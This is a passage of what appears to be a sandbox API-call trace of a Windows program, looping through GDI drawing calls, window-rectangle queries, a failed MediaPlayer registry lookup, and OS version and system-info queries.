(hdc=0x0, h=0x0) returned 0x0 [0092.179] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.179] BeginPath (hdc=0x0) returned 0 [0092.179] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.179] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.179] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.179] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.179] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.179] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.179] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.179] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.179] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.179] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.179] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.179] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.179] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.179] BeginPath (hdc=0x0) returned 0 [0092.179] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.180] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.180] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.180] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.180] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.180] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.180] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.180] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.180] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.180] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.180] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.180] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.180] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.180] BeginPath (hdc=0x0) returned 0 [0092.180] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.180] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.180] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.180] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.180] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.180] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.180] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.180] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.180] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.180] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.180] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.181] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.181] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.181] BeginPath (hdc=0x0) returned 0 [0092.181] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.181] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.181] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.181] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.181] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.181] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.181] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.181] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.181] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.181] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.181] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.181] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.181] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.181] BeginPath (hdc=0x0) returned 0 [0092.181] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.181] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.181] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.181] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.181] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.181] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.181] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.181] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.181] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.181] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.182] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.182] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.182] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.182] BeginPath (hdc=0x0) returned 0 [0092.182] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.182] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.182] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.182] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.182] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.182] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.182] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.182] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.182] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.182] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.182] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.182] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.182] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.182] BeginPath (hdc=0x0) returned 0 [0092.182] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.182] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.182] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.182] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.182] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.182] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.182] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.182] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.182] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.182] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.183] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.183] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.183] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.183] BeginPath (hdc=0x0) returned 0 [0092.183] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.183] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.183] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.183] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.183] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.183] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.183] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.183] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.183] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.183] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.183] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.183] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.183] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.183] BeginPath (hdc=0x0) returned 0 [0092.183] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.183] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.183] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.183] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.183] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.183] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.183] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.183] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.183] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.183] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.184] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.184] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.184] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.184] BeginPath (hdc=0x0) returned 0 [0092.184] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.184] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.184] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.184] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.184] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.184] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.184] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.184] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.184] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.184] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.184] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.184] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.184] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.184] BeginPath (hdc=0x0) returned 0 [0092.184] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.184] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.184] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.184] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.184] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.184] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.184] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.184] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.185] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.185] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.185] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.185] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.185] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.185] BeginPath (hdc=0x0) returned 0 [0092.185] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.185] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.185] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.185] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.185] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.185] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.185] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.185] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.185] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.185] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.185] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.185] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.185] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.185] BeginPath (hdc=0x0) returned 0 [0092.185] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.185] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.185] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.185] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.185] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.185] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.185] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.185] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.186] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.186] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.186] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.186] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.186] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.186] BeginPath (hdc=0x0) returned 0 [0092.186] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.186] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.186] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.186] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.186] GetWindowRect (in: 